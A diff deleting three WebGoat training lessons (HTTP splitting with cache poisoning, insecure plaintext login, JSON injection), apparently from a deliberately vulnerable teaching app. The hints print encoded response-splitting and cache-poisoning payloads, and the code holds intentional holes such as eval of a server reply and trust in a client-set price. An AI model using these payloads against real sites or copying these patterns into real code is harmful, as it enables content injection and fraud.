@@ -1,252 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.net.URLDecoder;
-import java.text.DateFormat;
-import java.text.SimpleDateFormat;
-import java.util.*;
-import javax.servlet.http.HttpServletResponse;
-import org.apache.ecs.*;
-import org.apache.ecs.html.*;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * @created September 30, 2006
- */
-
-public class HttpSplitting extends SequentialLessonAdapter
-{
-
-    private final static String LANGUAGE = "language";
-
-    private final static String REDIRECT = "fromRedirect";
-
-    private static String STAGE = "stage";
-
-    public final static A MAC_LOGO = new A().setHref("http://www.softwaresecured.com").addElement(new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured").setBorder(0).setHspace(0).setVspace(0));
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Current WebSession
-     */
-    public void handleRequest(WebSession s)
-    {
-        // Setting a special action to be able to submit to redirect.jsp
-        Form form = new Form(s.getRequest().getContextPath() + "/lessons/General/redirect.jsp?" + "Screen=" + String.valueOf(getScreenId())
-                + "&menu=" + getDefaultCategory().getRanking().toString(), Form.POST).setName("form").setEncType("");
-        
-        form.addElement(createContent(s));
-
-        setContent(form);
-    }
-
-    protected Element doHTTPSplitting(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String lang = null;
-
-        try
-        {
-            ec.addElement(createAttackEnvironment(s));
-            lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
-
-            // Check if we are coming from the redirect page
-            String fromRedirect = s.getParser().getStringParameter("fromRedirect", "");
-
-            if (lang.length() != 0 && fromRedirect.length() != 0)
-            {
-                
-    
-                String[] arrTokens = lang.toString().toUpperCase().split("\r\n");
-
-                // Check if the user ended the first request and wrote the second malicious reply
-                if (arrTokens.length > 1)
-                {
-                    HttpServletResponse res = s.getResponse();
-                    res.setContentType("text/html");
-
-                    StringBuffer msg = new StringBuffer();
-
-                    msg.append("Good Job! ");
-                    msg.append("This lesson has detected your successful attack, ");
-                    msg.append("time to elevate your attack to a higher level. ");
-                    msg.append("Try again and add Last-Modified header, intercept");
-                    msg.append("the reply and replace it with a 304 reply.");
-
-                    s.setMessage(msg.toString());
-                    getLessonTracker(s).setStage(2);
-
-
-                    //makeSuccess(s);
-
-                }
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-        return (ec);
-    }
-
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    protected Element doStage1(WebSession s) throws Exception
-    {
-        return doHTTPSplitting(s);
-    }
-
-    protected Element doStage2(WebSession s) throws Exception
-    {
-        return doCachePoisining(s);
-    }
-
-    protected Element createAttackEnvironment(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-        String lang = null;
-
-        if (getLessonTracker(s).getStage() == 1)
-        {
-            ec.addElement(new H3("Stage 1: HTTP Splitting:<br><br>"));
-        }
-        else
-        {
-            ec.addElement(new H3("Stage 2: Cache Poisoning:<br><br>"));
-        }
-        ec.addElement(new StringElement("Search by country : "));
-
-        lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
-
-        // add the search by field
-        Input input = new Input(Input.TEXT, LANGUAGE, lang.toString());
-        ec.addElement(input);
-
-        Element b = ECSFactory.makeButton("Search!");
-
-        ec.addElement(b);
-
-        return ec;
-    }
-
-    protected Element doCachePoisining(WebSession s) throws Exception
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            s.setMessage("Now that you have successfully performed an HTTP Splitting, now try to poison"
-                    + " the victim's cache. Type 'restart' in the input field if you wish to "
-                    + " to return to the HTTP Splitting lesson.<br><br>");
-            if (s.getParser().getRawParameter(LANGUAGE, "YOUR_NAME").equals("restart"))
-            {
-                getLessonTracker(s).getLessonProperties().setProperty(STAGE, "1");
-                return (doHTTPSplitting(s));
-            }
-
-            ec.addElement(createAttackEnvironment(s));
-            String lang = URLDecoder.decode(s.getParser().getRawParameter(LANGUAGE, ""), "UTF-8");
-            String fromRedirect = s.getParser().getStringParameter(REDIRECT, "");
-
-            if (lang.length() != 0 && fromRedirect.length() != 0)
-            {               
-                String lineSep = "\r\n";
-                String dateStr = lang.substring(lang.indexOf("Last-Modified:") + "Last-Modified:".length(), lang
-                        .indexOf(lineSep, lang.indexOf("Last-Modified:")));
-                if (dateStr.length() > 0)
-                {
-                    Calendar cal = Calendar.getInstance();
-
-                    DateFormat sdf = new SimpleDateFormat("EEE, dd MMM yyyy HH:mm:ss z", Locale.US);
-
-                    if (sdf.parse(dateStr.trim()).after(cal.getTime()))
-                    {
-                        makeSuccess(s);
-                    }
-                }
-            }
-        } catch (Exception ex)
-        {
-            ec.addElement(new P().addElement(ex.getMessage()));
-        }
-        return ec;
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.GENERAL;
-    }
-
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Enter a language for the system to search by.");
-        hints.add("Use CR (%0d) and LF (%0a) for a new line in Windows and only LF (%0a) in Linux.");
-        hints.add("The Content-Length: 0 will tell the server that the first request is over.");
-        hints.add("A 200 OK message looks like this: HTTP/1.1 200 OK");
-        hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/> Try: foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked!%3C%2Fhtml%3E <br/>For insight into what this does, use the PHP charset encoder to decode it.");
-        hints.add("Cache Poisoning starts with including 'Last-Modified' header in the hijacked page and setting it to a future date.");
-        hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try foobar%0D%0AContent-Length%3A%200%0D%0A%0D%0AHTTP%2F1.1%20200%20OK%0D%0AContent-Type%3A%20text%2Fhtml%0D%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202080%2014%3A50%3A18%20GMT%0D%0AContent-Length%3A%2047%0D%0A%0D%0A%3Chtml%3EHacked%20J%3C%2Fhtml%3E");
-        hints.add("'Last-Modified' header forces the browser to send a 'If-Modified-Since' header. Some cache servers will take the bait and keep serving the hijacked page");
-        hints.add("NOTE: THIS HINT IS FOR WINDOWS AND HAS TO BE ALTERED FOR ANOTHER SYSTEM <br/>Try to intercept the reply and add HTTP/1.1 304 Not Modified0d%0aDate:%20Mon,%2027%20Oct%202030%2014:50:18%20GMT");
-        return hints;
-
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(20);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("HTTP Splitting");
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa&nbsp;", MAC_LOGO);
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/InsecureLogin.java

@@ -1,496 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.List;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.BR;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.Option;
-import org.apache.ecs.html.Select;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.xhtml.style;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.WebSession;
-
-
-public class InsecureLogin extends SequentialLessonAdapter
-{
-
-    private final static String USER = "clear_user";
-    private final static String PASSWORD = "clear_pass";
-    private final static String ANSWER = "clear_answer";
-    private final static String YESNO = "yesno";
-    private final static String PROTOCOL = "protocol";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        return super.createStagedContent(s);
-    }
-
-    @Override
-    protected Element doStage1(WebSession s) throws Exception
-    {
-        String answer = s.getParser().getStringParameter(ANSWER, "");
-        if (answer.equals("sniffy"))
-        {
-            s.setMessage("You completed Stage 1!");
-            getLessonTracker(s).setStage(2);
-        }
-        return createMainContent(s);
-    }
-
-    @Override
-    protected Element doStage2(WebSession s) throws Exception
-    {
-        String protocol = s.getParser().getStringParameter(PROTOCOL, "");
-        String yesno = s.getParser().getStringParameter(YESNO, "");
-
-        if (yesno.equals("No") && protocol.equals("TLS"))
-        {
-            makeSuccess(s);
-        }
-
-        return createMainContent(s);
-    }
-
-    /**
-     * Creation of the main content
-     * 
-     * @param s
-     * @return Element
-     */
-    protected Element createMainContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        try
-        {
-            style sty = new style();
-
-            sty
-                    .addElement("#lesson_wrapper {height: 435px;width: 500px;}#lesson_header {background-image: url(lessons/DBSQLInjection/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}.lesson_workspace {background-image: url(lessons/DBSQLInjection/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}     .lesson_text {height: 240px;width: 460px;padding-top: 5px;}         #lesson_buttons_bottom {height: 20px;width: 460px;}         #lesson_b_b_left {width: 300px;float: left;}            #lesson_b_b_right input {width: 100px;float: right;}            .lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}           .lesson_workspace { }           .lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}         .lesson_text_db {color: #0066FF}            #lesson_login {background-image: url(lessons/DBSQLInjection/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}           #lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}           #lesson_search {background-image: url(lessons/DBSQLInjection/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}");
-            ec.addElement(sty);
-
-            Div wrapperDiv = new Div();
-            wrapperDiv.setID("lesson_wrapper");
-
-            Div headerDiv = new Div();
-            headerDiv.setID("lesson_header");
-
-            Div workspaceDiv = new Div();
-            workspaceDiv.setClass("lesson_workspace");
-
-            wrapperDiv.addElement(headerDiv);
-            wrapperDiv.addElement(workspaceDiv);
-
-            ec.addElement(wrapperDiv);
-
-            String user = s.getParser().getStringParameter(USER, "");
-            String password = s.getParser().getStringParameter(PASSWORD, "");
-            if (!(user + password).equals("") && correctLogin(user, password, s))
-            {
-                workspaceDiv.addElement(createSuccessfulLoginContent(s, user));
-            }
-            else
-            {
-                workspaceDiv.addElement(createLogInContent());
-            }
-        } catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Create content for logging in
-     * 
-     * @param ec
-     */
-    private Element createLogInContent()
-    {
-        ElementContainer ec = new ElementContainer();
-        Div loginDiv = new Div();
-        loginDiv.setID("lesson_login");
-
-        Table table = new Table();
-        table.addAttribute("align='center'", 0);
-        TR tr1 = new TR();
-        TD td1 = new TD();
-        TD td2 = new TD();
-        td1.addElement(new StringElement("Enter your name: "));
-        td2.addElement(new Input(Input.TEXT, USER).setValue("Jack").setReadOnly(true));
-        tr1.addElement(td1);
-        tr1.addElement(td2);
-
-        TR tr2 = new TR();
-        TD td3 = new TD();
-        TD td4 = new TD();
-        td3.addElement(new StringElement("Enter your password: "));
-        td4.addElement(new Input(Input.PASSWORD, PASSWORD).setValue("sniffy").setReadOnly(true));
-        tr2.addElement(td3);
-        tr2.addElement(td4);
-
-        TR tr3 = new TR();
-        TD td5 = new TD();
-        td5.setColSpan(2);
-        td5.setAlign("center");
-
-        td5.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        tr3.addElement(td5);
-
-        table.addElement(tr1);
-        table.addElement(tr2);
-        table.addElement(tr3);
-        loginDiv.addElement(table);
-        ec.addElement(loginDiv);
-        return ec;
-
-    }
-
-    /**
-     * Gets the category attribute of the ForgotPassword object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-
-        return Category.INSECURE_COMMUNICATION;
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-
-        hints.add("Stage 1: Use a sniffer to record " + "the traffic");
-        hints.add("Stage 1: What Protocol does the request use?");
-        hints.add("Stage 1: What kind of request is started when " + "you click on the button?");
-        hints.add("Stage 1: Take a closer look at the HTTP Post request in " + "your sniffer");
-        hints.add("Stage 1: The password field has the name clear_pass");
-
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(100);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Insecure Login");
-    }
-
-    @Override
-    public String getInstructions(WebSession s)
-    {
-        int stage = getLessonTracker(s).getStage();
-        String instructions = "";
-        instructions = "<b>For this lesson you need to " + "have a server client setup. Please refer to the"
-                + "Tomcat Configuration in the Introduction section.</b><br><br> Stage" + stage + ": ";
-        if (stage == 1)
-        {
-            instructions += "In this stage you have to sniff the "
-                    + "password. And answer the question after the login.";
-        }
-        if (stage == 2)
-        {
-            instructions += "Now you have to change to a secure " + "connection. The URL should start with https:// "
-                    + "If your browser is complaining about the certificate just "
-                    + "ignore it. Sniff again the traffic and answer the" + " questions";
-        }
-        return instructions;
-    }
-
-    /**
-     * See if the password and corresponding user is valid
-     * 
-     * @param userName
-     * @param password
-     * @param s
-     * @return true if the password was correct
-     */
-    private boolean correctLogin(String userName, String password, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT * FROM user_data_tan WHERE first_name = ? AND password = ?";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, userName);
-            prepStatement.setString(2, password);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            if ((results != null) && (results.first() == true)) {
-
-            return true;
-
-            }
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-
-        return false;
-
-    }
-
-    /**
-     * Create content after a successful login
-     * 
-     * @param s
-     * @param ec
-     */
-    private Element createSuccessfulLoginContent(WebSession s, String user)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        String userDataStyle = "margin-top:50px;";
-
-        Div userDataDiv = new Div();
-        userDataDiv.setStyle(userDataStyle);
-        userDataDiv.addAttribute("align", "center");
-        Table table = new Table();
-        table.addAttribute("cellspacing", 10);
-        table.addAttribute("cellpadding", 5);
-
-        table.addAttribute("align", "center");
-        TR tr1 = new TR();
-        TR tr2 = new TR();
-        TR tr3 = new TR();
-        TR tr4 = new TR();
-        tr1.addElement(new TD("<b>Firstname:</b>"));
-        tr1.addElement(new TD(user));
-
-        try
-        {
-            ResultSet results = getUser(user, s);
-            results.first();
-
-            tr2.addElement(new TD("<b>Lastname:</b>"));
-            tr2.addElement(new TD(results.getString("last_name")));
-
-            tr3.addElement(new TD("<b>Credit Card Type:</b>"));
-            tr3.addElement(new TD(results.getString("cc_type")));
-
-            tr4.addElement(new TD("<b>Credit Card Number:</b>"));
-            tr4.addElement(new TD(results.getString("cc_number")));
-
-        }
-
-        catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-        table.addElement(tr1);
-        table.addElement(tr2);
-        table.addElement(tr3);
-        table.addElement(tr4);
-
-        userDataDiv.addElement(table);
-        ec.addElement(userDataDiv);
-        ec.addElement(createLogoutLink());
-
-        int stage = getLessonTracker(s).getStage();
-        if (stage == 1)
-        {
-            ec.addElement(createPlaintextQuestionContent());
-        }
-        else if (stage == 2)
-        {
-            ec.addElement(createSSLQuestionContent());
-        }
-
-        return ec;
-    }
-
-    private Element createPlaintextQuestionContent()
-    {
-        ElementContainer ec = new ElementContainer();
-        Div div = new Div();
-        div.addAttribute("align", "center");
-        div.addElement(new BR());
-        div.addElement(new BR());
-        div.addElement("What was the password?");
-        div.addElement(new Input(Input.TEXT, ANSWER));
-        div.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        ec.addElement(div);
-        return ec;
-    }
-
-    private Element createSSLQuestionContent()
-    {
-        ElementContainer ec = new ElementContainer();
-        Table selectTable = new Table();
-        TR tr1 = new TR();
-        TD td1 = new TD();
-        TD td2 = new TD();
-        TR tr2 = new TR();
-        TD td3 = new TD();
-        TD td4 = new TD();
-        tr1.addElement(td1);
-        tr1.addElement(td2);
-        tr2.addElement(td3);
-        tr2.addElement(td4);
-        selectTable.addElement(tr1);
-        selectTable.addElement(tr2);
-
-        Div div = new Div();
-        div.addAttribute("align", "center");
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-
-        td1.addElement("Is the password still transmited in plaintext?");
-        Select yesNoSelect = new Select();
-        yesNoSelect.setName(YESNO);
-        Option yesOption = new Option();
-        yesOption.addElement("Yes");
-        Option noOption = new Option();
-        noOption.addElement("No");
-        yesNoSelect.addElement(yesOption);
-        yesNoSelect.addElement(noOption);
-        td2.addElement(yesNoSelect);
-
-        td3.addElement("Which protocol is used for the transmission?");
-        Select protocolSelect = new Select();
-        protocolSelect.setName(PROTOCOL);
-        Option httpOption = new Option();
-        httpOption.addElement("HTTP");
-        Option tcpOption = new Option();
-        tcpOption.addElement("UDP");
-        Option ipsecOption = new Option();
-        ipsecOption.addElement("IPSEC");
-        Option msnmsOption = new Option();
-        msnmsOption.addElement("MSNMS");
-        Option tlsOption = new Option();
-        tlsOption.addElement("TLS");
-        protocolSelect.addElement(httpOption);
-        protocolSelect.addElement(ipsecOption);
-        protocolSelect.addElement(msnmsOption);
-        protocolSelect.addElement(tcpOption);
-        protocolSelect.addElement(tlsOption);
-        td4.addElement(protocolSelect);
-
-        div.addElement(selectTable);
-
-        div.addElement(new Input(Input.SUBMIT, "Submit", "Submit"));
-        ec.addElement(div);
-        return ec;
-    }
-
-    /**
-     * Get a user by its name
-     * 
-     * @param user
-     * @param s
-     * @return ResultSet containing the user
-     */
-    private ResultSet getUser(String user, WebSession s)
-    {
-        Connection connection = null;
-        try
-        {
-            connection = DatabaseUtilities.getConnection(s);
-            String query = "SELECT * FROM user_data_tan WHERE first_name = ? ";
-            PreparedStatement prepStatement = connection.prepareStatement(query, ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                            ResultSet.CONCUR_READ_ONLY);
-            prepStatement.setString(1, user);
-
-            ResultSet results = prepStatement.executeQuery();
-
-            return results;
-
-        } catch (Exception e)
-        {
-            e.printStackTrace();
-        } finally
-        {
-            try
-            {
-                if (connection != null)
-                {
-                    connection.close();
-                }
-            } catch (Exception e)
-            {
-                e.printStackTrace();
-            }
-        }
-        return null;
-
-    }
-
-    /**
-     * Create a link for logging out
-     * 
-     * @return Element
-     */
-    private Element createLogoutLink()
-    {
-        A logoutLink = new A();
-        logoutLink.addAttribute("href", getLink() + "&logout=true");
-        logoutLink.addElement("Logout");
-
-        String logoutStyle = "margin-right:50px; mrgin-top:30px";
-        Div logoutDiv = new Div();
-        logoutDiv.addAttribute("align", "right");
-        logoutDiv.addElement(logoutLink);
-        logoutDiv.setStyle(logoutStyle);
-
-        return logoutDiv;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by: Reto Lippuner, Marcel Wirth", new StringElement(""));
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/JSONInjection.java

@@ -1,298 +0,0 @@
-
-package org.owasp.webgoat.lessons;
-
-import org.owasp.webgoat.session.WebSession;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.Div;
-import org.apache.ecs.html.Form;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Table;
-import org.apache.ecs.html.TR;
-import org.apache.ecs.html.TD;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.BR;
-import java.io.PrintWriter;
-import java.util.List;
-import java.util.ArrayList;
-
-
-/***************************************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
- * please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under the terms of the
- * GNU General Public License as published by the Free Software Foundation; either version 2 of the
- * License, or (at your option) any later version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
- * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- * General Public License for more details.
- * 
- * You should have received a copy of the GNU General Public License along with this program; if
- * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
- * 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
- * projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Sherif Koussa <a href="http://www.softwaresecured.com">Software Secured</a>
- * @created December 25, 2006
- */
-
-public class JSONInjection extends LessonAdapter
-{
-
-    private final static Integer DEFAULT_RANKING = new Integer(30);
-
-    private final static String TRAVEL_FROM = "travelFrom";
-
-    private final static String TRAVEL_TO = "travelTo";
-
-    private final static IMG MAC_LOGO = new IMG("images/logos/softwaresecured.gif").setAlt("Software Secured")
-            .setBorder(0).setHspace(0).setVspace(0);
-
-    public void handleRequest(WebSession s)
-    {
-
-        try
-        {
-            if (s.getParser().getRawParameter("from", "").equals("ajax"))
-            {
-                String lineSep = System.getProperty("line.separator");
-                String jsonStr = "{" + lineSep + "\"From\": \"Boston\"," + lineSep + "\"To\": \"Seattle\", " + lineSep
-                        + "\"flights\": [" + lineSep
-                        + "{\"stops\": \"0\", \"transit\" : \"N/A\", \"price\": \"$600\"}," + lineSep
-                        + "{\"stops\": \"2\", \"transit\" : \"Newark,Chicago\", \"price\": \"$300\"} " + lineSep + "]"
-                        + lineSep + "}";
-                s.getResponse().setContentType("text/html");
-                s.getResponse().setHeader("Cache-Control", "no-cache");
-                PrintWriter out = new PrintWriter(s.getResponse().getOutputStream());
-                out.print(jsonStr);
-                out.flush();
-                out.close();
-                return;
-            }
-        } catch (Exception ex)
-        {
-            ex.printStackTrace();
-        }
-
-        Form form = new Form(getFormAction(), Form.POST).setName("form").setEncType("");
-        form.setOnSubmit("return check();");
-
-        form.addElement(createContent(s));
-
-        setContent(form);
-
-    }
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Current WebSession
-     */
-
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        String lineSep = System.getProperty("line.separator"); 
-        String script = "<script>"
-                + lineSep
-                + "function getFlights() {"
-                + lineSep
-                + "var fromField = document.getElementById('"
-                + TRAVEL_FROM
-                + "');"
-                + lineSep
-                + "if (fromField.value.length < 3 || fromField.value!='BOS') { return; }"
-                + lineSep
-                + "var toField = document.getElementById('"
-                + TRAVEL_TO
-                + "');"
-                + lineSep
-                + "if (toField.value.length < 3 || toField.value!='SEA') { return; }"
-                + lineSep
-                + "var url = '"
-                + getLink()
-                + "&from=ajax&"
-                + TRAVEL_FROM
-                + "=' + encodeURIComponent(fromField.value) +"
-                + "'&"
-                + TRAVEL_TO
-                + "=' + encodeURIComponent(toField.value);"
-                + lineSep
-                + "if (typeof XMLHttpRequest != 'undefined') {"
-                + lineSep
-                + "req = new XMLHttpRequest();"
-                + lineSep
-                + "} else if (window.ActiveXObject) {"
-                + lineSep
-                + "req = new ActiveXObject('Microsoft.XMLHTTP');"
-                + lineSep
-                + "   }"
-                + lineSep
-                + "   req.open('GET', url, true);"
-                + lineSep
-                + "   req.onreadystatechange = callback;"
-                + lineSep
-                + "   req.send(null);"
-                + lineSep
-                + "}"
-                + lineSep
-                + "function callback() {"
-                + lineSep
-                + "    if (req.readyState == 4) { "
-                + lineSep
-                + "        if (req.status == 200) { "
-                + lineSep
-                + "                   var card = eval('(' + req.responseText + ')');"
-                + lineSep
-                + "          var flightsDiv = document.getElementById('flightsDiv');"
-                + lineSep
-                + "             flightsDiv.innerHTML = '';"
-                + lineSep
-                + "             var strHTML='';"
-                + lineSep
-                + "             strHTML = '<tr><td>&nbsp;</td><td>No of Stops</td>';"
-                + lineSep
-                + "             strHTML = strHTML + '<td>Stops</td><td>Prices</td></tr>';"
-                + lineSep
-                + "          for(var i=0; i<card.flights.length; i++){"
-                + lineSep
-                + "             var node = card.flights[i];"
-                + lineSep
-                + "             strHTML = strHTML + '<tr><td><input name=\"radio'+i+'\" type=\"radio\" id=\"radio'+i+'\"></td><td>';"
-                + lineSep
-                + "             strHTML = strHTML + card.flights[i].stops + '</td><td>';"
-                + lineSep
-                + "             strHTML = strHTML + card.flights[i].transit + '</td><td>';"
-                + lineSep
-                + "             strHTML = strHTML + '<div name=\"priceID'+i+'\" id=\"priceID'+i+'\">' + card.flights[i].price + '</div></td></tr>';"
-                + lineSep
-                + "          }"
-                + lineSep
-                + "             strHTML = '<table border=\"1\">' + strHTML + '</table>';"
-                + lineSep
-                + "               flightsDiv.innerHTML = strHTML;"
-                + lineSep
-                + "        }}}"
-                + lineSep
-                +
-
-                "function check(){"
-                + lineSep
-                + " if ( document.getElementById('radio0') && document.getElementById('radio0').checked  )"
-                + lineSep
-                + " { document.getElementById('price2Submit').value = document.getElementById('priceID0').innerHTML; return true;}"
-                + lineSep
-                + " else if ( document.getElementById('radio1') && document.getElementById('radio1').checked  )"
-                + lineSep
-                + " { document.getElementById('price2Submit').value = document.getElementById('priceID1').innerHTML; return true;}"
-                + lineSep + " else " + lineSep + " { alert('Please choose one flight'); return false;}" + lineSep + "}"
-                + lineSep + "</script>" + lineSep;
-        ec.addElement(new StringElement(script));
-        Table t1 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(0).setWidth("90%").setAlign("center");
-
-        TR tr = new TR();
-
-        tr.addElement(new TD("From: "));
-        Input in = new Input(Input.TEXT, TRAVEL_FROM, "");
-        in.addAttribute("onkeyup", "getFlights();");
-        in.addAttribute("id", TRAVEL_FROM);
-        tr.addElement(new TD(in));
-
-        t1.addElement(tr);
-
-        tr = new TR();
-        tr.addElement(new TD("To: "));
-        in = new Input(Input.TEXT, TRAVEL_TO, "");
-        in.addAttribute("onkeyup", "getFlights();");
-        in.addAttribute("id", TRAVEL_TO);
-        tr.addElement(new TD(in));
-
-        t1.addElement(tr);
-        ec.addElement(t1);
-
-        ec.addElement(new BR());
-        ec.addElement(new BR());
-        Div div = new Div();
-        div.addAttribute("name", "flightsDiv");
-        div.addAttribute("id", "flightsDiv");
-        ec.addElement(div);
-
-        Input b = new Input();
-        b.setType(Input.SUBMIT);
-        b.setValue("Submit");
-        b.setName("SUBMIT");
-        ec.addElement(b);
-
-        Input price2Submit = new Input();
-        price2Submit.setType(Input.HIDDEN);
-        price2Submit.setName("price2Submit");
-        price2Submit.setValue("");
-        price2Submit.addAttribute("id", "price2Submit");
-        ec.addElement(price2Submit);
-        if (s.getParser().getRawParameter("radio0", "").equals("on"))
-        {
-            String price = s.getParser().getRawParameter("price2Submit", "");
-            price = price.replace("$", "");
-            if (Integer.parseInt(price) < 600)
-            {
-                makeSuccess(s);
-            }
-            else
-            {
-                s.setMessage("You are close, try to set the price for the non-stop flight to be less than $600");
-            }
-        }
-        return ec;
-    }
-
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Sherif Koussa", MAC_LOGO);
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.AJAX_SECURITY;
-    }
-
-    protected List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("JSON stands for JavaScript Object Notation.");
-        hints.add("JSON is a way of representing data just like XML.");
-        hints.add("The JSON payload is easily interceptable.");
-        hints.add("Intercept the reply, change the $600 to $25.");
-        return hints;
-
-    }
-
-    protected Integer getDefaultRanking()
